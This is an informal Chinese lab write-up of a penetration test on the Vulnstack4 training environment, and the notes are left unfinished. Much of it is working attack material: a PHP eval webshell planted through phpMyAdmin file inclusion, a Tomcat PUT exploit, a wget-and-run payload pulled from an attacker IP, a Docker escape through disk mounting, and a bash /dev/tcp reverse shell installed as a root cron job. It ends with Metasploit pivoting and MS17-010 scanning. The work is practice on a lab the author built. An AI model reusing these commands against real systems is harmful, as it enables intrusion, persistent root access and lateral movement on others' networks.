半个Vulnstack4渗透笔记

环境搭建

下载完环境用vmware打开，把出口机的第一个网卡开桥接，其他都是仅主机模式

进去看了下各个机器的ip，把DC的静态地址改到了和其他两台机器一个段即可

现在出口机器的192.168.2.209，内网那个段是192.168.91.0/24

外网渗透（假的）

老样子先扫一下子端口

扫出来有点傻眼，只开了个22，好了搜了一下回退到环境搭建

出口机器上用docker起几个环境

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045v
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613
sudo docker-compose up -d

好了现在环境搭建完成

外网渗透

nmap扫一下子

现在对劲了

访问一下2001端口，标题给了是struts2框架

用工具没扫出来

没关系换个端口试一下啊

2003进去看到版本是phpmyadmin4.8.1，搜索得到这个版本有cve-2018-12613

存在任意文件包含

在控制台执行sql语句

select "<?php eval($_REQUEST[2])?>"

此时会在session文件中存值，包含session文件即可拿到webshell，这里在/tmp目录下，命名由cookie中的phpmyadmin决定

尝试了一些办法上线msf不过都失败了.后来看了一下wp说是环境问题？

换到2002

是cve-2017-12615（影响版本和此版本对不上，但是仍然存在这个洞）

找了一个python写的exp

evil.jsp里可以执行系统命令，在msf里生成个🐎并监听

uname -a  #简单信息搜集
wget http://192.168.2.108/shell.elf #利用wget下载🐎
chmod 777 shell.elf
./shell.elf

拿到meterpreter shell

这个时候是在docker环境，要想办法逃逸出到真实的内网环境

尝试在msf里打cve-2019-5736未果，遂学习一下其他思路逃逸

docker逃逸

利用磁盘挂载逃逸，执行命令

fdisk -l #查看磁盘文件
mkdir /hack
mount /dev/sda1 /hack #将/dev/sda1挂载在hack目录

此时hack目录下就可以访问宿主机的文件了，通过写crontab反弹shell

echo "/bin/bash -i >& bash -i >& /dev/tcp/192.168.2.244/5555 0>&1" >> /hack/tmp/shell.sh #写反弹shell的脚本放入宿主机tmp目录
chmod 777 /hack.tmp/shell.sh #加权
echo "*/2 * * * * root bash /tmp/shell.sh" > /hack/etc/crontab   #写计划任务：每两分钟以root权限执行shell.sh

在本地监听即可拿到反弹shell

横向移动

首先故技重施wget下载shell拿到meterpreter

进行内网信息搜集

arp  #发现还有一个91网段
run autoroute -s 192.168.91.0、24 -n 255.255.255.0 #添加路由
background
search auxiliary/scanner/discovery  #存活主机发现
use 5
show options
set rhosts 192.168.91.1-254
run

发现192.168.91.10和131 ，扫下端口

search portscan
use 5
set rhosts 192.168.91.10,131
run

开启445端口，扫一下ms17_010

search ms_17_010
use 0
set rhosts 192.168.91.10,131
run

这里扫出来两个都有，用msf没打出来，换个方法

环境出了点问题..卡了半天了..待解决